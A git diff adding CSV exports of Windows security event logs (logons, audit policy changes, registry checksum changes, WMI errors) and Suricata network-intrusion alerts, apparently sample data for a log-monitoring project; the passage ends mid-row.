+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
+ - Transited services indicate which intermediate services have participated in this logon request.
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""",
+"May 22, 2020 @ 15:10:06.455",3,"Service startup type was changed","""The start type of the Windows Modules Installer service was changed from demand start to auto start.""",
+"May 22, 2020 @ 15:09:55.485",3,"Software Protection service scheduled successfully","""Successfully scheduled Software Protection service for re-start at 2020-05-23T13:16:40Z. Reason: RulesEngine.""",
+"May 22, 2020 @ 15:09:32.985",3,"Windows Logon Success","""An account was successfully logged on.
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Logon Information:
+ Logon Type: 5
+ Restricted Admin Mode: -
+ Virtual Account: No
+ Elevated Token: Yes
+
+Impersonation Level: Impersonation
+
+New Logon:
+ Security ID: S-1-5-18
+ Account Name: SYSTEM
+ Account Domain: NT AUTHORITY
+ Logon ID: 0x3E7
+ Linked Logon ID: 0x0
+ Network Account Name: -
+ Network Account Domain: -
+ Logon GUID: {00000000-0000-0000-0000-000000000000}
+
+Process Information:
+ Process ID: 0x244
+ Process Name: C:\Windows\System32\services.exe
+
+Network Information:
+ Workstation Name: -
+ Source Network Address: -
+ Source Port: -
+
+Detailed Authentication Information:
+ Logon Process: Advapi
+ Authentication Package: Negotiate
+ Transited Services: -
+ Package Name (NTLM only): -
+ Key Length: 0
+
+This event is generated when a logon session is created. It is generated on the computer that was accessed.
+
+The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
+
+The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
+
+The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
+
+The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
+
+The impersonation level field indicates the extent to which a process in the logon session can impersonate.
+
+The authentication information fields provide detailed information about this specific logon request.
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
+ - Transited services indicate which intermediate services have participated in this logon request.
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""",
+"May 22, 2020 @ 15:09:28.904",3,"Windows Logon Success","""An account was successfully logged on.
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Logon Information:
+ Logon Type: 5
+ Restricted Admin Mode: -
+ Virtual Account: No
+ Elevated Token: Yes
+
+Impersonation Level: Impersonation
+
+New Logon:
+ Security ID: S-1-5-18
+ Account Name: SYSTEM
+ Account Domain: NT AUTHORITY
+ Logon ID: 0x3E7
+ Linked Logon ID: 0x0
+ Network Account Name: -
+ Network Account Domain: -
+ Logon GUID: {00000000-0000-0000-0000-000000000000}
+
+Process Information:
+ Process ID: 0x244
+ Process Name: C:\Windows\System32\services.exe
+
+Network Information:
+ Workstation Name: -
+ Source Network Address: -
+ Source Port: -
+
+Detailed Authentication Information:
+ Logon Process: Advapi
+ Authentication Package: Negotiate
+ Transited Services: -
+ Package Name (NTLM only): -
+ Key Length: 0
+
+This event is generated when a logon session is created. It is generated on the computer that was accessed.
+
+The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
+
+The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
+
+The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
+
+The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
+
+The impersonation level field indicates the extent to which a process in the logon session can impersonate.
+
+The authentication information fields provide detailed information about this specific logon request.
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
+ - Transited services indicate which intermediate services have participated in this logon request.
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""",
+"May 22, 2020 @ 15:09:15.715",8,"Windows Audit Policy changed","""System audit policy was changed.
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Audit Policy Change:
+ Category: Object Access
+ Subcategory: Handle Manipulation
+ Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030}
+ Changes: Success Added""",
+"May 22, 2020 @ 15:09:15.708",8,"Windows Audit Policy changed","""System audit policy was changed.
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Audit Policy Change:
+ Category: Object Access
+ Subcategory: File System
+ Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030}
+ Changes: Success Added""",
+"May 22, 2020 @ 15:09:10.849",5,"Name resolution for the name www.bbc.com timed out","""Name resolution for the name www.bbc.com timed out after none of the configured DNS servers responded.""",
+"May 22, 2020 @ 15:09:07.785",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed.
+Old md5sum was: '7fa7290c3b0e7b2d8ed5a092299db356'
+New md5sum is : '271f59daf9ca28fbeb0bd234897e1662'
+Old sha1sum was: '27735fff26a4f9093576dfbd77d06599094d3497'
+New sha1sum is : 'e8d6ecabf76ed97cd87dc8593f64cd69ec8ec7a2'
+"
+"May 22, 2020 @ 15:09:01.487",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed.
+Old md5sum was: '370914f65a755a1cbfcf0c873b11feaa'
+New md5sum is : '1c729912f87f9abbd1574176fc5996f7'
+Old sha1sum was: 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b'
+New sha1sum is : '1d2094dc263dc3db258f4421536e179cfbd9cfb0'
+"
+"May 22, 2020 @ 15:09:01.379",3,"Windows Logon Success","""An account was successfully logged on.
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Logon Information:
+ Logon Type: 5
+ Restricted Admin Mode: -
+ Virtual Account: No
+ Elevated Token: Yes
+
+Impersonation Level: Impersonation
+
+New Logon:
+ Security ID: S-1-5-18
+ Account Name: SYSTEM
+ Account Domain: NT AUTHORITY
+ Logon ID: 0x3E7
+ Linked Logon ID: 0x0
+ Network Account Name: -
+ Network Account Domain: -
+ Logon GUID: {00000000-0000-0000-0000-000000000000}
+
+Process Information:
+ Process ID: 0x244
+ Process Name: C:\Windows\System32\services.exe
+
+Network Information:
+ Workstation Name: -
+ Source Network Address: -
+ Source Port: -
+
+Detailed Authentication Information:
+ Logon Process: Advapi
+ Authentication Package: Negotiate
+ Transited Services: -
+ Package Name (NTLM only): -
+ Key Length: 0
+
+This event is generated when a logon session is created. It is generated on the computer that was accessed.
+
+The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
+
+The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
+
+The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
+
+The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
+
+The impersonation level field indicates the extent to which a process in the logon session can impersonate.
+
+The authentication information fields provide detailed information about this specific logon request.
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
+ - Transited services indicate which intermediate services have participated in this logon request.
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""",
+"May 22, 2020 @ 15:08:44.237",5,"Windows error event","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = DESKTOP-HUE026H\John Williams; ClientProcessId = 6876; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory WHERE Tag='Physical Memory 0'; ResultCode = 0x80041032; PossibleCause = Unknown""",
+"May 22, 2020 @ 15:08:44.224",5,"Windows error event","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = DESKTOP-HUE026H\John Williams; ClientProcessId = 6876; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive WHERE DeviceID LIKE '%PHYSICALDRIVE0%'; ResultCode = 0x80041032; PossibleCause = Unknown""",
+"May 22, 2020 @ 15:08:44.194",5,"Windows error event","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = DESKTOP-HUE026H\John Williams; ClientProcessId = 6876; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystemProduct; ResultCode = 0x80041032; PossibleCause = Unknown""",
+"May 22, 2020 @ 15:08:31.202",3,"Windows Logon Success","""An account was successfully logged on.
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Logon Information:
+ Logon Type: 5
+ Restricted Admin Mode: -
+ Virtual Account: No
+ Elevated Token: Yes
+
+Impersonation Level: Impersonation
+
+New Logon:
+ Security ID: S-1-5-18
+ Account Name: SYSTEM
+ Account Domain: NT AUTHORITY
+ Logon ID: 0x3E7
+ Linked Logon ID: 0x0
+ Network Account Name: -
+ Network Account Domain: -
+ Logon GUID: {00000000-0000-0000-0000-000000000000}
+
+Process Information:
+ Process ID: 0x244
+ Process Name: C:\Windows\System32\services.exe
+
+Network Information:
+ Workstation Name: -
+ Source Network Address: -
+ Source Port: -
+
+Detailed Authentication Information:
+ Logon Process: Advapi
+ Authentication Package: Negotiate
+ Transited Services: -
+ Package Name (NTLM only): -
+ Key Length: 0
+
+This event is generated when a logon session is created. It is generated on the computer that was accessed.
+
+The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
+
+The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
+
+The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
+
+The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
+
+The impersonation level field indicates the extent to which a process in the logon session can impersonate.
+
+The authentication information fields provide detailed information about this specific logon request.
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
+ - Transited services indicate which intermediate services have participated in this logon request.
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""",
+"May 22, 2020 @ 15:08:17.757",5,"Windows error event","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 3256; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\CIMV2 : select ChassisTypes from Win32_SystemEnclosure; ResultCode = 0x80041032; PossibleCause = Unknown""",
+"May 22, 2020 @ 15:07:55.054",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed.
+Old md5sum was: 'b40de87500ee3eed90c2ce3ce8c7946f'
+New md5sum is : '9d15aff4d26f802c3c4d3d74a00d8d4d'
+Old sha1sum was: '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792'
+New sha1sum is : '11f3afa3902d0fadfcc52e4c051995f536c7d4e2'
+"
+"May 22, 2020 @ 15:07:52.691",5,"License Activation (slui.exe) failed","""License Activation (slui.exe) failed with the following error code:
+hr=0x803F7001
+Command-line arguments:
+RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=TimerEvent""",
+"May 22, 2020 @ 15:07:51.478",5,"License Activation (slui.exe) failed","""License Activation (slui.exe) failed with the following error code:
+hr=0x803F7001
+Command-line arguments:
+RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=UserLogon;SessionId=1""",
+"May 22, 2020 @ 15:07:48.108",3,"Windows Logon Success","""An account was successfully logged on.
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Logon Information:
+ Logon Type: 5
+ Restricted Admin Mode: -
+ Virtual Account: No
+ Elevated Token: Yes
+
+Impersonation Level: Impersonation
+
+New Logon:
+ Security ID: S-1-5-18
+ Account Name: SYSTEM
+ Account Domain: NT AUTHORITY
+ Logon ID: 0x3E7
+ Linked Logon ID: 0x0
+ Network Account Name: -
+ Network Account Domain: -
+ Logon GUID: {00000000-0000-0000-0000-000000000000}
+
+Process Information:
+ Process ID: 0x244
+ Process Name: C:\Windows\System32\services.exe
+
+Network Information:
+ Workstation Name: -
+ Source Network Address: -
+ Source Port: -
+
+Detailed Authentication Information:
+ Logon Process: Advapi
+ Authentication Package: Negotiate
+ Transited Services: -
+ Package Name (NTLM only): -
+ Key Length: 0
+
+This event is generated when a logon session is created. It is generated on the computer that was accessed.
+
+The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
+
+The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
+
+The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
+
+The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
+
+The impersonation level field indicates the extent to which a process in the logon session can impersonate.
+
+The authentication information fields provide detailed information about this specific logon request.
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
+ - Transited services indicate which intermediate services have participated in this logon request.
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""",
diff --git a/data/NULLTEST_NIDS.csv b/data/NULLTEST_NIDS.csv
new file mode 100644
index 0000000..7fa4f50
--- /dev/null
+++ b/data/NULLTEST_NIDS.csv
@@ -0,0 +1,92 @@
+"@timestamp",message,"log.file.path"
+"Apr 4, 2020 @ 14:17:21.957","04/04/2020-14:17:15.892884 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49910 -> 40.112.91.29:443","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 14:17:21.957","04/04/2020-14:17:16.058461 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49911 -> 52.164.221.179:443","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 14:16:36.953","04/04/2020-14:16:28.699113 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49902 -> 204.79.197.200:443","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 14:16:36.953","04/04/2020-14:16:28.856094 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49903 -> 40.112.91.29:443","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 14:16:36.953","04/04/2020-14:16:29.144607 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49904 -> 52.164.221.179:443","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 14:15:01.944","04/04/2020-14:15:01.097202 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 14:15:01.943","04/04/2020-14:15:00.026702 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49862 -> 23.216.248.201:80","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 14:15:01.943","04/04/2020-14:15:00.185738 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 14:15:01.943","04/04/2020-14:15:00.202452 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49863 -> 23.216.248.201:80","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 14:15:01.943","04/04/2020-14:15:00.363285 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 14:15:01.943","04/04/2020-14:15:00.384791 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49864 -> 23.216.248.201:80","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 14:15:01.943","04/04/2020-14:15:00.540522 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 14:15:01.943","04/04/2020-14:15:00.575767 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49865 -> 23.216.248.201:80","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 14:15:01.943","04/04/2020-14:15:00.737943 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 14:15:01.943","04/04/2020-14:15:00.765554 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49866 -> 
23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:15:01.943","04/04/2020-14:15:00.922604 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:15:01.943","04/04/2020-14:15:00.941666 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49867 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:54.925","04/04/2020-14:14:54.094948 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:53.924","04/04/2020-14:14:53.017360 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:53.924","04/04/2020-14:14:53.045360 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49852 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:53.924","04/04/2020-14:14:53.199636 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:53.924","04/04/2020-14:14:53.216698 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49853 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 
14:14:53.924","04/04/2020-14:14:53.372765 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:53.924","04/04/2020-14:14:53.398940 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49854 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:53.924","04/04/2020-14:14:53.551477 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:53.924","04/04/2020-14:14:53.633212 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49855 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:53.924","04/04/2020-14:14:53.806811 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:53.924","04/04/2020-14:14:53.907213 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49856 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:50.773445 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:50.834734 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device 
Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49838 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:50.995946 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:51.010990 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49839 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:51.165571 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:51.194822 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49840 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:51.345398 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:51.358540 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49841 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:51.511312 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] 
{TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:51.528123 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49842 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:51.683343 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:51.697101 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49843 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:51.851360 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:51.909558 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49845 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:52.082298 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:52.096916 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49847 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 
14:14:52.923","04/04/2020-14:14:52.249210 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:52.286215 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49848 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:52.440222 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:52.461215 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49849 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:52.632359 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:52.686152 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49850 -> 